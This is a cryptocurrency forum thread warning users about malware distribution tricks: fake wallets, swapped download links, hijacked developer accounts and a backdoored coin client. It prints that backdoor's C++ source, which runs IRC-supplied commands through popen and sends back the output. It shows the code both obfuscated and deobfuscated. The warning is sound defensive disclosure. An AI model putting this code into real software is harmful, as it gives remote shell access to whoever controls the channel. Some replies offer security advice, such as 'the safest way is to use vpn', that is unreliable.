I can not understand why the purse is so vulnerable. Why are developers still unable to come up with reliable protection? ((
yeah I can understand why you are so annoyed about itlets hope that they will work out something soon
Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 15. (Read 704727 times)
lets hope that they will work out something soon
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.
"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.
Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).
Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.
Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.
Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.
Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Thank you so much for the information I think we all must be more careful when we deal with our money- you have inspired me to review my antivirus "latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.
Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).
Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.
Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.
Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.
Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
OMG
i can;t believe this information.
thank you guys.
i will pass the message across.
Thanks
i can;t believe this information.
thank you guys.
i will pass the message across.
Thanks
I'm adding this to the list of possible scams:
https://bitcointalksearch.org/topic/blockchain-different-from-source-code-951827
Thank you so much! I hope the people who committed that crime will find their punishment! and, of course, poor people who lost their money https://bitcointalksearch.org/topic/blockchain-different-from-source-code-951827
I have to say, anything at all on the internet that has money involved, one needs to be careful because there are thieves everywhere, even in our local banks. So I will say keep your passkeys very very secured, You might have police at you local banks, but there's no police here. We don't need them here because our security is in our hands.
I just received something like this an hour ago. I was surfing Ebay and laughed when I saw PimpCash. Having to see if it was real, I went to pimpcash.com. Immediately something like what you showed came up. However, for me, it pretended to be my service provider and gave me a number to call. I confess I did try to call but the ring didn't sound right. Sounded like an old telephone. I hung up and rebooted my computer. Things seem to be ok now. I ran a quick scan and all seems to be okay. Is there anything else I should do to check to see if my computer is okay?
This sounds really scary, but I guess that where is the money, there are also malversations
Anyhow, you always need to be careful...
Yeah, I agree. Unfortunately, you cannot trust anyone and should check information twice, and, of course, never give your privare data Anyhow, you always need to be careful...
Could you please post the coin's name and maybe others that you may have found ?
Thank you so much for your information! I have never heard of such things before,and I hope I will never face it. I will share your information with my friends, thanx!
Yup, I’ve been hearing a lot about this lately.
This sounds really scary, but I guess that where is the money, there are also malversations
Anyhow, you always need to be careful...
Anyhow, you always need to be careful...
Can you please explain how to protect yourself from attacks? Can I put Linux and not survive? or is there a threat anyway?
I think vpn routers can help also to block malwares or attackers..
The safest way to secure your your account is to use vpn.
The safest way to secure your your account is to use vpn.
I can not understand why the purse is so vulnerable. Why are developers still unable to come up with reliable protection? ((
Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.
I led a large number of bounty, recorded everything on a flash drive, all tables, all the links, and what do you think? All burned, all my work, all I did for weeks. I'm tired of this, really it is impossible to fight?
The more crypto grows the smarter the hackers it attracts.
Thank you very much for the useful information. I, of course, are very frightened that more and more people are writing that they have lost their means.
April 30, 2018, 09:29:35 PM
I'm spooked not goanna lie. This is news to me geez
April 29, 2018, 07:41:00 PM
Many thanks for alerting us about the dangers of malware. When I started working on my computer, I always reminded myself to be alert to emails, ads ... potentially containing malicious software, malicious code, viruses. Just a careless click, every effort, the money you try to accumulate will fall into the hands of the bad guys.
Although you are very careful, your computer can still be attacked by malware. The software can retrieve your personal information to send to the hacker. Everything that you keep on your computer will be sent to the bad guys. Ideally, you should install a secure and reliable software on your computer. At times, using some manual remedies is unbelievably effective. Wish you always safe. April 29, 2018, 08:35:25 AM
Thanks for this information. I have known many things from this thread.
Jump to: